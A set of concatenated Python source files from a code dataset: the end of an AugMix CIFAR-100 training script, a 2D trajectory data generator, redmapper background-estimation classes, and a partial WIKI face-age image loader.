parser.add_argument(\"--experiment\", default='experiments/CIFAR100/dummy/shape=0_color=0',\n help=\"Logs dir path\")\n parser.add_argument(\"--save_checkpoint_interval\", type=int, default=10, help=\"Save checkpoints every i epochs\")\n\n # AugMix options\n parser.add_argument(\n '--mixture-width',\n default=3,\n type=int,\n help='Number of augmentation chains to mix per augmented example')\n parser.add_argument(\n '--mixture-depth',\n default=-1,\n type=int,\n help='Depth of augmentation chains. 
-1 denotes stochastic depth in [1, 3]')\n parser.add_argument(\n '--aug-severity',\n default=3,\n type=int,\n help='Severity of base augmentation operators')\n parser.add_argument(\n '--no-jsd',\n '-nj',\n action='store_true',\n help='Turn off JSD consistency loss.')\n parser.add_argument(\n '--all-ops',\n '-all',\n action='store_true',\n help='Turn on all operations (+brightness,contrast,color,sharpness).')\n\n args = parser.parse_args()\n\n args.checkpoint = f'{args.experiment}/checkpoints'\n args.log_dir = f'{args.experiment}/logs'\n\n return args\n\ndef save_checkpoint(state, is_best, checkpoint='checkpoint', filename='checkpoint.pth.tar'):\n if not os.path.exists(checkpoint):\n os.makedirs(checkpoint)\n\n filepath = os.path.join(checkpoint, filename)\n torch.save(state, filepath)\n if is_best:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'model_best.pth.tar'))\n\ndef save_args_json(args):\n args_dict = vars(args)\n\n if not os.path.exists(args.log_dir):\n os.makedirs(args.log_dir)\n\n with open(f'{args.log_dir}/args.json', 'w') as outfile:\n json.dump(args_dict, outfile, indent=4, sort_keys=True)\n\ndef MSE_loss(criterion, pred, target, device='cuda'):\n return criterion(pred, target)\n\ndef get_lr(step, total_steps, lr_max, lr_min):\n \"\"\"Compute learning rate according to cosine annealing schedule.\"\"\"\n return lr_min + (lr_max - lr_min) * 0.5 * (1 +\n np.cos(step / total_steps * np.pi))\n\nclass Trainer:\n def __init__(self, args, device):\n self.args = args\n self.device = device\n self.start_epoch = 0\n self.best_acc = 0\n\n self.use_shape = (self.args.shape_loss_weight > 0)\n self.use_color = (self.args.color_loss_weight > 0)\n\n self.train_loader = get_train_loader(args, CIFAR100Dataset, use_sobel=self.use_shape, use_color=self.use_color)\n self.val_loader = get_val_loader(args, CIFAR100Dataset)\n\n model = resnext29(num_classes=100)\n\n self.optimizer = optim.SGD(model.parameters(), lr=args.learning_rate, momentum=0.9, weight_decay=5e-4,\n nesterov=True)\n self.scheduler = torch.optim.lr_scheduler.LambdaLR(\n self.optimizer,\n lr_lambda=lambda step: get_lr( # pylint: disable=g-long-lambda\n step,\n args.epochs * len(self.train_loader),\n 1, # lr_lambda computes multiplicative factor\n 1e-6 / args.learning_rate))\n\n if args.resume and os.path.isfile(args.resume):\n print(f'Loading checkpoint {args.resume}')\n\n checkpoint = torch.load(args.resume)\n self.start_epoch = checkpoint['epoch']\n self.best_acc = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n\n print(f'Loaded checkpoint {args.resume}, starting from epoch {self.start_epoch}')\n\n if args.data_parallel:\n model = torch.nn.DataParallel(model)\n\n self.model = model.to(device)\n\n self.criterion = nn.CrossEntropyLoss()\n self.shape_criterion = nn.MSELoss()\n self.distance_loss_func = MSE_loss\n\n cudnn.benchmark = True\n self.writer = SummaryWriter(log_dir=str(args.log_dir))\n\n def _do_epoch(self, epoch_idx):\n self.model.train()\n\n for batch_idx, (images, targets) in enumerate(self.train_loader):\n self.optimizer.zero_grad()\n\n if self.args.no_jsd:\n images, targets = images.to(self.device), targets.to(self.device)\n logits = self.model(images)\n loss = F.cross_entropy(logits, targets)\n else:\n images_all = torch.cat(images, 0).to(self.device)\n targets = targets.to(self.device)\n logits_all = self.model(images_all)\n logits_clean, logits_aug1, logits_aug2 = torch.split(\n logits_all, images[0].size(0))\n\n # 
Cross-entropy is only computed on clean images\n loss = F.cross_entropy(logits_clean, targets)\n\n p_clean, p_aug1, p_aug2 = F.softmax(\n logits_clean, dim=1), F.softmax(\n logits_aug1, dim=1), F.softmax(\n logits_aug2, dim=1)\n\n # Clamp mixture distribution to avoid exploding KL divergence\n p_mixture = torch.clamp((p_clean + p_aug1 + p_aug2) / 3., 1e-7, 1).log()\n loss += 12 * (F.kl_div(p_mixture, p_clean, reduction='batchmean') +\n F.kl_div(p_mixture, p_aug1, reduction='batchmean') +\n F.kl_div(p_mixture, p_aug2, reduction='batchmean')) / 3.\n\n\n if batch_idx % 100 == 1:\n print(f'epoch: {epoch_idx}/{self.args.epochs}, batch: {batch_idx}/{len(self.train_loader)}, '\n f'loss: {loss.item()}')\n\n n_iter = epoch_idx * len(self.train_loader) + batch_idx\n self.writer.add_scalar('loss_train', loss.item(), n_iter)\n\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n\n last_layer = list(self.model.children())[-1]\n for name, para in last_layer.named_parameters():\n if 'weight' in name:\n self.writer.add_scalar('LastLayerGradients/grad_norm2_weights', para.grad.norm(), n_iter)\n if 'bias' in name:\n self.writer.add_scalar('LastLayerGradients/grad_norm2_bias', para.grad.norm(), n_iter)\n\n self.model.eval()\n with torch.no_grad():\n total = len(self.val_loader.dataset)\n class_correct = self.do_test(self.val_loader)\n class_acc = float(class_correct) / total\n print(f'Validation Accuracy: {class_acc}')\n\n is_best = False\n if class_acc > self.best_acc:\n self.best_acc = class_acc\n is_best = True\n\n if is_best or (epoch_idx + 1) % self.args.save_checkpoint_interval == 0:\n checkpoint_name = f'checkpoint_{epoch_idx + 1}_acc_{round(class_acc, 3)}.pth.tar'\n print(f'Saving {checkpoint_name} to dir {self.args.checkpoint}')\n\n if self.args.data_parallel:\n state_dict = self.model.module.state_dict()\n else:\n state_dict = self.model.state_dict()\n\n save_checkpoint({\n 'epoch': epoch_idx + 1,\n 'state_dict': state_dict,\n 'best_prec1': self.best_acc,\n 'optimizer': self.optimizer.state_dict(),\n }, is_best, checkpoint=self.args.checkpoint, filename=checkpoint_name)\n\n self.writer.add_scalar('val_accuracy', class_acc, epoch_idx)\n\n def do_test(self, loader):\n class_correct = 0\n\n for i, (inputs, targets, _) in enumerate(loader, 1):\n inputs, targets = inputs.to(self.device), targets.to(self.device)\n\n # forward\n outputs = self.model(inputs)\n\n _, cls_pred = outputs.max(dim=1)\n\n class_correct += torch.sum(cls_pred == targets)\n\n return class_correct\n\n def do_training(self):\n for self.current_epoch in range(self.start_epoch, self.args.epochs):\n self._do_epoch(self.current_epoch)\n\n self.writer.close()\n\n return self.best_acc\n\ndef main():\n args = get_args()\n\n torch.manual_seed(0)\n torch.cuda.manual_seed(0)\n np.random.seed(0)\n random.seed(0)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n if sys.gettrace() is not None: # debug\n print('Debug mode!')\n args.n_workers = 0\n\n save_args_json(args)\n\n trainer = Trainer(args, device)\n best_val_acc = trainer.do_training()\n\nif __name__ == \"__main__\":\n torch.cuda.empty_cache()\n torch.backends.cudnn.benchmark = True\n main()","sub_path":"CIFAR100/train_augmix.py","file_name":"train_augmix.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"234446311","text":"import andi\r\nimport numpy as np\r\nimport pandas as pd\r\nimport argparse\r\nimport gc\r\n\r\nparser = 
argparse.ArgumentParser()\r\narg = parser.add_argument\r\narg('--N', type=int)\r\narg('--l', type=int)\r\nargs = parser.parse_args()\r\n\r\nN = args.N\r\nl = args.l\r\nfilename = './origin_data/data-2d-{}.csv'.format(l)\r\noutput = './pp_data_2d/data-2d-{}-pp.csv'.format(l)\r\n\r\nAD = andi.andi_datasets()\r\nX1, Y1, X2, Y2, X3, Y3 = AD.andi_dataset(N=N, max_T=l+1, min_T=l, tasks=1, dimensions=2)\r\n\r\nwith open(filename, 'w') as f:\r\n f.write('pos;label\\n')\r\n for i in range(len(X1[1])):\r\n f.write(','.join([str(j) for j in X1[1][i]]))\r\n f.write(';'+str(Y1[1][i])+'\\n')\r\n f.close()\r\n\r\ndel X1, Y1\r\ngc.collect()\r\n\r\ndata = pd.read_csv(filename, sep=';')\r\ndata['length'] = data['pos'].apply(lambda x: round(len(x.split(','))/2))\r\n\r\ndata['pos_x'] = data.apply(lambda x: ','.join(x['pos'].split(',')[:x['length']]), axis=1)\r\ndata['pos_y'] = data.apply(lambda x: ','.join(x['pos'].split(',')[x['length']:]), axis=1)\r\n\r\ndel data['pos']\r\n\r\ndef normalize(x):\r\n data = np.array([float(i) for i in x.split(',')])\r\n mean = np.mean(data)\r\n std = np.std(data)\r\n data2 = (data - mean)/std\r\n return ','.join([str(i) for i in data2])\r\n\r\ndata['pos_x'] = data['pos_x'].apply(lambda x: normalize(x))\r\ndata['pos_y'] = data['pos_y'].apply(lambda x: normalize(x))\r\n\r\ndata[['pos_x','pos_y','length','label']].to_csv(output, index=False, sep=';')\r\n","sub_path":"generate_trajectory/inf_generate_trajectory_2d.py","file_name":"inf_generate_trajectory_2d.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"161962445","text":"from __future__ import division, absolute_import, print_function\nfrom past.builtins import xrange\n\nimport fitsio\nimport numpy as np\nimport healpy as hp\nimport time\nimport copy\n\nimport multiprocessing\nfrom multiprocessing import Pool\n\nimport types\ntry:\n import copy_reg as copyreg\nexcept ImportError:\n import copyreg\n\nfrom .catalog import Entry\nfrom .galaxy import GalaxyCatalog\nfrom .redsequence import RedSequenceColorPar\nfrom .chisq_dist import ChisqDist\nfrom .depthmap import DepthMap\nfrom .utilities import interpol, cic\nfrom .utilities import _pickle_method\n\ncopyreg.pickle(types.MethodType, _pickle_method)\n\nclass Background(object):\n \"\"\"\n Name:\n Background\n Purpose:\n An object used to hold the background. 
This also\n contains the functionality to interpolate between\n known background points.\n\n parameters\n ----------\n filename: string\n background filename\n \"\"\"\n\n def __init__(self, filename):\n #\"\"\"\n #docstring for the constructor\n #\"\"\"\n # Get the raw object background from the fits file\n obkg = Entry.from_fits_file(filename, ext='CHISQBKG')\n\n # Set the bin size in redshift, chisq and refmag spaces\n self.zbinsize = 0.001\n self.chisqbinsize = 0.5\n self.refmagbinsize = 0.01\n\n # Create the refmag bins\n refmagbins = np.arange(obkg.refmagrange[0], obkg.refmagrange[1], self.refmagbinsize)\n nrefmagbins = refmagbins.size\n\n # Create the chisq bins\n nchisqbins = obkg.chisqbins.size\n nlnchisqbins = obkg.lnchisqbins.size\n\n # Read out the number of redshift bins from the object background\n nzbins = obkg.zbins.size\n\n # Set up some arrays to populate\n sigma_g_new = np.zeros((nrefmagbins, nchisqbins, nzbins))\n sigma_lng_new = np.zeros((nrefmagbins, nchisqbins, nzbins))\n\n # Do linear interpolation to get the sigma_g value\n # between the raw background points.\n # If any values are less than 0 then turn them into 0.\n for i in range(nzbins):\n for j in range(nchisqbins):\n sigma_g_new[:,j,i] = np.interp(refmagbins, obkg.refmagbins, obkg.sigma_g[:,j,i])\n sigma_g_new[:,j,i] = np.where(sigma_g_new[:,j,i] < 0, 0, sigma_g_new[:,j,i])\n sigma_lng_new[:,j,i] = np.interp(refmagbins, obkg.refmagbins, obkg.sigma_lng[:,j,i])\n sigma_lng_new[:,j,i] = np.where(sigma_lng_new[:,j,i] < 0, 0, sigma_lng_new[:,j,i])\n\n sigma_g = sigma_g_new.copy()\n sigma_lng = sigma_lng_new.copy()\n\n chisqbins = np.arange(obkg.chisqrange[0], obkg.chisqrange[1], self.chisqbinsize)\n nchisqbins = chisqbins.size\n\n sigma_g_new = np.zeros((nrefmagbins, nchisqbins, nzbins))\n\n # Now do the interpolation in chisq space\n for i in range(nzbins):\n for j in range(nrefmagbins):\n sigma_g_new[j,:,i] = np.interp(chisqbins, obkg.chisqbins, sigma_g[j,:,i])\n sigma_g_new[j,:,i] = np.where(sigma_g_new[j,:,i] < 0, 0, sigma_g_new[j,:,i])\n\n sigma_g = sigma_g_new.copy()\n\n zbins = np.arange(obkg.zrange[0], obkg.zrange[1], self.zbinsize)\n nzbins = zbins.size\n\n sigma_g_new = np.zeros((nrefmagbins, nchisqbins, nzbins))\n sigma_lng_new = np.zeros((nrefmagbins, nlnchisqbins, nzbins))\n\n # Now do the interpolation in redshift space\n for i in range(nchisqbins):\n for j in range(nrefmagbins):\n sigma_g_new[j,i,:] = np.interp(zbins, obkg.zbins, sigma_g[j,i,:])\n sigma_g_new[j,i,:] = np.where(sigma_g_new[j,i,:] < 0, 0, sigma_g_new[j,i,:])\n\n for i in range(nlnchisqbins):\n for j in range(nrefmagbins):\n sigma_lng_new[j,i,:] = np.interp(zbins, obkg.zbins, sigma_lng[j,i,:])\n sigma_lng_new[j,i,:] = np.where(sigma_lng_new[j,i,:] < 0, 0, sigma_lng_new[j,i,:])\n\n n_new = np.zeros((nrefmagbins, nzbins))\n for i in range(nzbins):\n n_new[:,i] = np.sum(sigma_g_new[:,:,i], axis=1) * self.chisqbinsize\n\n # Save all meaningful fields\n # to be attributes of the background object.\n self.refmagbins = refmagbins\n self.chisqbins = chisqbins\n self.lnchisqbins = obkg.lnchisqbins\n self.zbins = zbins\n self.sigma_g = sigma_g_new\n self.sigma_lng = sigma_lng_new\n self.n = n_new\n\n def sigma_g_lookup(self, z, chisq, refmag, allow0=False):\n \"\"\"\n Name:\n sigma_g_lookup\n Purpose:\n return the value of sigma_g at points in redshift, chisq and refmag space\n Inputs:\n z: redshift\n chisq: chisquared value\n refmag: reference magnitude\n Optional Inputs:\n allow0 (boolean): if we allow sigma_g to be zero \n and the chisq is 
very high. Set to False by default.\n Outputs:\n lookup_vals: the looked-up values of sigma_g\n \"\"\"\n zmin = self.zbins[0]\n chisqindex = np.searchsorted(self.chisqbins, chisq) - 1\n refmagindex = np.searchsorted(self.refmagbins, refmag) - 1\n # Look into changing to searchsorted\n ind = np.clip(np.round((z-zmin)/(self.zbins[1]-zmin)),0, self.zbins.size-1).astype(np.int32)\n\n badchisq, = np.where((chisq < self.chisqbins[0]) |\n (chisq > (self.chisqbins[-1] + self.chisqbinsize)))\n badrefmag, = np.where((refmag <= self.refmagbins[0]) |\n (refmag > (self.refmagbins[-1] + self.refmagbinsize)))\n\n chisqindex[badchisq] = 0\n refmagindex[badrefmag] = 0\n\n zindex = np.full_like(chisqindex, ind)\n lookup_vals = self.sigma_g[refmagindex, chisqindex, zindex]\n lookup_vals[badchisq] = np.inf\n lookup_vals[badrefmag] = np.inf\n\n if not allow0:\n lookup_vals[np.where((lookup_vals == 0) & (chisq > 5.0))] = np.inf\n return lookup_vals\n\nclass ZredBackground(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, filename):\n obkg = Entry.from_fits_file(filename, ext='ZREDBKG')\n\n # Will want to make configurable\n self.refmagbinsize = 0.01\n self.zredbinsize = 0.001\n\n # Create the refmag bins\n refmagbins = np.arange(obkg.refmagrange[0], obkg.refmagrange[1], self.refmagbinsize)\n nrefmagbins = refmagbins.size\n\n # Leave the zred bins the same\n nzredbins = obkg.zredbins.size\n\n # Set up arrays to populate\n # sigma_g_new = np.zeros((nzredbins, nrefmagbins))\n sigma_g_new = np.zeros((nrefmagbins, nzredbins))\n\n floor = np.min(obkg.sigma_g)\n\n for i in xrange(nzredbins):\n #sigma_g_new[i, :] = np.clip(interpol(obkg.sigma_g[i, :], obkg.refmagbins, refmagbins), floor, None)\n sigma_g_new[:, i] = np.clip(interpol(obkg.sigma_g[:, i], obkg.refmagbins, refmagbins), floor, None)\n\n sigma_g = sigma_g_new.copy()\n\n # And update zred\n zredbins = np.arange(obkg.zredrange[0], obkg.zredrange[1], self.zredbinsize)\n nzredbins = zredbins.size\n\n #sigma_g_new = np.zeros((nzredbins, nrefmagbins))\n sigma_g_new = np.zeros((nrefmagbins, nzredbins))\n\n for i in xrange(nrefmagbins):\n #sigma_g_new[:, i] = np.clip(interpol(sigma_g[:, i], obkg.zredbins, zredbins), floor, None)\n sigma_g_new[i, :] = np.clip(interpol(sigma_g[i, :], obkg.zredbins, zredbins), floor, None)\n\n self.zredbins = zredbins\n self.zredrange = obkg.zredrange\n self.zred_index = 0\n self.refmag_index = 1\n self.refmagbins = refmagbins\n self.refmagrange = obkg.refmagrange\n self.sigma_g = sigma_g_new\n\n def sigma_g_lookup(self, zred, refmag):\n \"\"\"\n \"\"\"\n\n zredindex = np.searchsorted(self.zredbins, zred) - 1\n refmagindex = np.searchsorted(self.refmagbins, refmag) - 1\n\n badzred, = np.where((zredindex < 0) |\n (zredindex >= self.zredbins.size))\n zredindex[badzred] = 0\n badrefmag, = np.where((refmagindex < 0) |\n (refmagindex >= self.refmagbins.size))\n refmagindex[badrefmag] = 0\n\n #lookup_vals = self.sigma_g[zredindex, refmagindex]\n lookup_vals = self.sigma_g[refmagindex, zredindex]\n\n lookup_vals[badzred] = np.inf\n lookup_vals[badrefmag] = np.inf\n\n return lookup_vals\n\nclass BackgroundGenerator(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, config):\n # We need to delete \"cosmo\" from the config for pickling/multiprocessing\n self.config = copy.deepcopy(config)\n self.config.cosmo = None\n\n def run(self, clobber=False, natatime=100000, deepmode=False):\n \"\"\"\n \"\"\"\n\n self.natatime = natatime\n self.deepmode = deepmode\n\n if not clobber:\n if os.path.isfile(self.config.bkgfile):\n fits = 
fitsio.FITS(self.config.bkgfile)\n if 'CHISQBKG' in [ext.get_extname() for ext in fits[1: ]]:\n print(\"CHISQBKG already in %s and clobber is False\" % (self.config.bkgfile))\n return\n fits.close()\n\n # get the ranges\n self.refmagrange = np.array([12.0, self.config.limmag_catalog])\n self.nrefmagbins = np.ceil((self.refmagrange[1] - self.refmagrange[0]) / self.config.bkg_refmagbinsize).astype(np.int32)\n self.refmagbins = np.arange(self.nrefmagbins) * self.config.bkg_refmagbinsize + self.refmagrange[0]\n\n self.chisqrange = np.array([0.0, self.config.chisq_max])\n self.nchisqbins = np.ceil((self.chisqrange[1] - self.chisqrange[0]) / self.config.bkg_chisqbinsize).astype(np.int32)\n self.chisqbins = np.arange(self.nchisqbins) * self.config.bkg_chisqbinsize + self.chisqrange[0]\n\n self.lnchisqbinsize = 0.2\n self.lnchisqrange = np.array([-2.0, 6.0])\n self.nlnchisqbins = np.ceil((self.lnchisqrange[1] - self.lnchisqrange[0]) / self.lnchisqbinsize).astype(np.int32)\n self.lnchisqbins = np.arange(self.nlnchisqbins) * self.lnchisqbinsize + self.lnchisqrange[0]\n\n self.nzbins = np.ceil((self.config.zrange[1] - self.config.zrange[0]) / self.config.bkg_zbinsize).astype(np.int32)\n self.zbins = np.arange(self.nzbins) * self.config.bkg_zbinsize + self.config.zrange[0]\n\n # this is the background hist\n sigma_g = np.zeros((self.nrefmagbins, self.nchisqbins, self.nzbins))\n sigma_lng = np.zeros((self.nrefmagbins, self.nlnchisqbins, self.nzbins))\n\n # We need the areas from the depth map\n depthstr = DepthMap(self.config)\n self.areas = depthstr.calc_areas(self.refmagbins)\n\n\n # Split into bins for parallel running\n logrange = np.log(np.array([self.config.zrange[0] - 0.001,\n self.config.zrange[1] + 0.001]))\n logbinsize = (logrange[1] - logrange[0]) / self.config.calib_nproc\n zedges = (np.exp(logrange[0]) + np.exp(logrange[1])) - np.exp(logrange[0] + np.arange(self.config.calib_nproc + 1) * logbinsize)\n\n worker_list = []\n for i in xrange(self.config.calib_nproc):\n ubins, = np.where((self.zbins < zedges[i]) & (self.zbins > zedges[i + 1]))\n gd, = np.where(ubins < self.zbins.size)\n ubins = ubins[gd]\n\n zbinmark = np.zeros(self.zbins.size, dtype=np.bool)\n zbinmark[ubins] = True\n\n worker_list.append(zbinmark)\n\n pool = Pool(processes=self.config.calib_nproc)\n retvals = pool.map(self._worker, worker_list, chunksize=1)\n pool.close()\n pool.join()\n\n # And store the results\n for zbinmark, sigma_g_sub, sigma_lng_sub in retvals:\n sigma_g[:, :, zbinmark] = sigma_g_sub\n sigma_lng[:, :, zbinmark] = sigma_lng_sub\n\n # And save them\n dtype = [('zbins', 'f4', self.zbins.size),\n ('zrange', 'f4', 2),\n ('zbinsize', 'f4'),\n ('chisq_index', 'i4'),\n ('refmag_index', 'i4'),\n ('chisqbins', 'f4', self.chisqbins.size),\n ('chisqrange', 'f4', 2),\n ('chisqbinsize', 'f4'),\n ('lnchisqbins', 'f4', self.lnchisqbins.size),\n ('lnchisqrange', 'f4', 2),\n ('lnchisqbinsize', 'f4'),\n ('areas', 'f4', self.areas.size),\n ('refmagbins', 'f4', self.refmagbins.size),\n ('refmagrange', 'f4', 2),\n ('refmagbinsize', 'f4'),\n ('sigma_g', 'f4', sigma_g.shape),\n ('sigma_lng', 'f4', sigma_lng.shape)]\n\n chisq_bkg = np.zeros(1, dtype=dtype)\n chisq_bkg[0]['zbins'] = self.zbins\n chisq_bkg[0]['zrange'] = self.config.zrange\n chisq_bkg[0]['zbinsize'] = self.config.bkg_zbinsize\n chisq_bkg[0]['chisq_index'] = 0\n chisq_bkg[0]['refmag_index'] = 1\n chisq_bkg[0]['chisqbins'] = self.chisqbins\n chisq_bkg[0]['chisqrange'] = self.chisqrange\n chisq_bkg[0]['chisqbinsize'] = self.config.bkg_chisqbinsize\n 
chisq_bkg[0]['lnchisqbins'] = self.lnchisqbins\n chisq_bkg[0]['lnchisqrange'] = self.lnchisqrange\n chisq_bkg[0]['lnchisqbinsize'] = self.lnchisqbinsize\n chisq_bkg[0]['areas'] = self.areas\n chisq_bkg[0]['refmagbins'] = self.refmagbins\n chisq_bkg[0]['refmagrange'] = self.refmagrange\n chisq_bkg[0]['refmagbinsize'] = self.config.bkg_refmagbinsize\n chisq_bkg[0]['sigma_g'] = sigma_g\n chisq_bkg[0]['sigma_lng'] = sigma_lng\n\n fitsio.write(self.config.bkgfile, chisq_bkg, extname='CHISQBKG', clobber=clobber)\n\n\n\n def _worker(self, zbinmark):\n \"\"\"\n \"\"\"\n\n starttime = time.time()\n\n zbins_use = self.zbins[zbinmark]\n zrange_use = np.array([zbins_use[0], zbins_use[-1] + self.config.bkg_zbinsize])\n\n # We need to load in the red sequence structure -- just in the specific redshift range\n zredstr = RedSequenceColorPar(self.config.parfile, zrange=zrange_use)\n\n zredstrbinsize = zredstr.z[1] - zredstr.z[0]\n zpos = np.searchsorted(zredstr.z, zbins_use)\n\n # How many galaxies total?\n if self.config.galfile_pixelized:\n master = Entry.from_fits_file(self.config.galfile)\n\n if (self.config.hpix > 0):\n # We need to take a sub-region\n theta, phi = hp.pix2ang(master.nside, master.hpix)\n ipring_big = hp.ang2pix(self.config.nside, theta, phi)\n subreg_indices, = np.where(ipring_big == self.config.hpix)\n else:\n subreg_indices = np.arange(master.hpix.size)\n\n ngal = np.sum(master.ngals[subreg_indices])\n npix = subreg_indices.size\n else:\n hdr = fitsio.read_header(self.config.galfile, ext=1)\n\n ngal = hdr['NAXIS2']\n npix = 0\n\n nmag = self.config.nmag\n ncol = nmag - 1\n\n # default values are all guaranteed to be out of range\n chisqs = np.zeros((ngal, zbins_use.size), dtype=np.float32) + np.exp(np.max(self.lnchisqbins)) + 100.0\n refmags = np.zeros(ngal, dtype=np.float32)\n\n if (self.deepmode):\n zlimmag = zredstr.mstar(zbins_use + self.config.bkg_zbinsize) - 2.5 * np.log10(0.01)\n else:\n zlimmag = zredstr.mstar(zbins_use + self.config.bkg_zbinsize) - 2.5 * np.log10(0.1)\n\n bad, = np.where(zlimmag >= self.config.limmag_catalog)\n zlimmag[bad] = self.config.limmag_catalog - 0.01\n zlimmagpos = np.clip(((zlimmag - self.refmagrange[0]) * self.nrefmagbins / (self.refmagrange[1] - self.refmagrange[0])).astype(np.int32), 0, self.nrefmagbins - 1)\n zlimmag = self.refmagbins[zlimmagpos] + self.config.bkg_refmagbinsize\n\n zbinmid = np.median(np.arange(zredstr.z.size - 1))\n\n # And the main loop\n ctr = 0\n p = 0\n # This covers both loops\n while ((ctr < ngal) and (p < npix)):\n # Read in a section of the galaxies, or the pixel\n if not self.config.galfile_pixelized:\n lo = ctr\n hi = np.clip(ctr + self.natatime, None, ngal)\n\n gals = GalaxyCatalog.from_fits_file(self.config.galfile, rows=np.arange(lo, hi))\n ctr = hi + 1\n else:\n if master.ngals[subreg_indices[p]] == 0:\n p += 1\n continue\n\n gals = GalaxyCatalog.from_galfile(self.config.galfile, nside=master.nside,\n hpix=master.hpix[subreg_indices[p]], border=0.0)\n\n lo = ctr\n hi = ctr + gals.size\n\n ctr += master.ngals[subreg_indices[p]]\n p += 1\n\n inds = np.arange(lo, hi)\n\n refmags[inds] = gals.refmag\n\n for i, zbin in enumerate(zbins_use):\n use, = np.where((gals.refmag > self.refmagrange[0]) &\n (gals.refmag < zlimmag[i]))\n\n if (use.size > 0):\n # Compute chisq at the redshift zbin\n chisqs[inds[use], i] = zredstr.calculate_chisq(gals[use], zbin)\n\n binsizes = self.config.bkg_refmagbinsize * self.config.bkg_chisqbinsize\n lnbinsizes = self.config.bkg_refmagbinsize * self.lnchisqbinsize\n\n sigma_g_sub = 
np.zeros((self.nrefmagbins, self.nchisqbins, zbins_use.size))\n sigma_lng_sub = np.zeros((self.nrefmagbins, self.nlnchisqbins, zbins_use.size))\n\n for i, zbin in enumerate(zbins_use):\n use, = np.where((chisqs[:, i] >= self.chisqrange[0]) &\n (chisqs[:, i] < self.chisqrange[1]) &\n (refmags >= self.refmagrange[0]) &\n (refmags < self.refmagrange[1]))\n chisqpos = (chisqs[use, i] - self.chisqrange[0]) * self.nchisqbins / (self.chisqrange[1] - self.chisqrange[0])\n refmagpos = (refmags[use] - self.refmagrange[0]) * self.nrefmagbins / (self.refmagrange[1] - self.refmagrange[0])\n\n value = np.ones(use.size)\n\n field = cic(value, chisqpos, self.nchisqbins, refmagpos, self.nrefmagbins, isolated=True)\n for j in xrange(self.nchisqbins):\n sigma_g_sub[:, j, i] = field[:, j] / (self.areas * binsizes)\n\n lnchisqs = np.log(chisqs[:, i])\n\n use, = np.where((lnchisqs >= self.lnchisqrange[0]) &\n (lnchisqs < self.lnchisqrange[1]) &\n (refmags >= self.refmagrange[0]) &\n (refmags < self.refmagrange[1]))\n lnchisqpos = (lnchisqs[use] - self.lnchisqrange[0]) * self.nlnchisqbins / (self.lnchisqrange[1] - self.lnchisqrange[0])\n refmagpos = (refmags[use] - self.refmagrange[0]) * self.nrefmagbins / (self.refmagrange[1] - self.refmagrange[0])\n\n value = np.ones(use.size)\n\n field2 = cic(value, lnchisqpos, self.nlnchisqbins, refmagpos, self.nrefmagbins, isolated=True)\n\n for j in xrange(self.nlnchisqbins):\n sigma_lng_sub[:, j, i] = field2[:, j] / (self.areas * lnbinsizes)\n\n print(\"Finished %.2f < z < %.2f in %.1f seconds\" % (zbins_use[0], zbins_use[-1],\n time.time() - starttime))\n\n return (zbinmark, sigma_g_sub, sigma_lng_sub)\n\n","sub_path":"redmapper/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":19501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"586442589","text":"import matplotlib.pyplot as plt\nimport scipy.ndimage\nfrom scipy import misc\nimport scipy.io\nimport numpy as np\nimport glob\nfrom datetime import datetime, timedelta\n#import dill as pickle\n\n# following should be deleted or commented afer trial\n'''\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"/tmp/data\", one_hot = True)\n\nx, y = mnist.train.next_batch(1)\nprint(mnist.train.images.shape[0])\nprint(mnist.test.images.shape[0])\nprint(x.shape, 'type: ',type(x))\nprint(y.shape)\n'''\ndef resize_img(img_path):\n\timg = scipy.ndimage.imread(img_path, flatten=True)\n\timg = misc.imresize(img, (100, 100))\n\timg = img.flatten()\n\n\t# img = np.array([img])\n\n\treturn list(img)\n\ndef mat_loader(path):\n\t# matfile = '/home/jzhao/Desktop/wiki_crop/wiki.mat'\n\tmat = scipy.io.loadmat(path)\n\n\twiki = mat['wiki']\n\n\titem = wiki[0][0]\n\n\tdob = item[0][0]\n\tphoto_taken = item[1][0]\n\tphoto_path = item[2][0]\n\n\tlabel_dict = {}\n\n\tfor i in range(len(dob)):\n\t\tbirth = datetime.fromordinal(int(dob[i]))+timedelta(days=int(dob[i]%1))-timedelta(days=366)\n\t\tlabel_dict[photo_path[i][0]] = photo_taken[i]-birth.year\n\n\treturn label_dict\n\ndef generateData(mat_file, img_directory):\n\timages_and_labels = []\n\n\tmat_path = mat_file #'/home/jzhao/Desktop/wiki_crop/wiki.mat'\n\tlabel_dict = mat_loader(mat_path)\n\tprint(len(label_dict))\n\n\tcount=0\n\tfor folder in range(5): #!!! 
changed from 100 to 10\n\t\tpath = img_directory #'/home/jzhao/Desktop/wiki_crop/'\n\t\tf_name = str(folder) if folder>=10 else '0'+str(folder)\n\t\tpath += f_name + '/*.jpg'\n\t\tprint('reading images in file:', f_name)\n\t\tfor filename in glob.glob(path):\n\t\t\timg = scipy.ndimage.imread(filename)\n\t\t\tif img.shape[0]<=300 and img.shape[1]<=300:\n\t\t\t\tdata_x = resize_img(filename)\n\t\t\t\tdata_y = np.zeros(100)\n\t\t\t\tindex = label_dict[f_name+'/'+filename.split('/')[-1]]\n\t\t\t\t# if index > len(data_y):\n\t\t\t\tindex = int(len(data_y)/2) if index >= len(data_y) else index\n\t\t\t\tdata_y[index] += 1 #one_hot\n\t\t\t\tdata_y = list(data_y)\n\t\t\t\tcount += 1\n\n\t\t\t\t# images_and_label = []\n\t\t\t\t# images_and_label.append(data_x)\n\t\t\t\t# images_and_label.append(data_y)\n\t\t\t\t# images_and_labels.append(images_and_label)\n\t\t\t\timages_and_labels.append([data_x, data_y])\n\n\tprint('totally processed:', count, 'and', len(images_and_labels))\n\ttest_size = 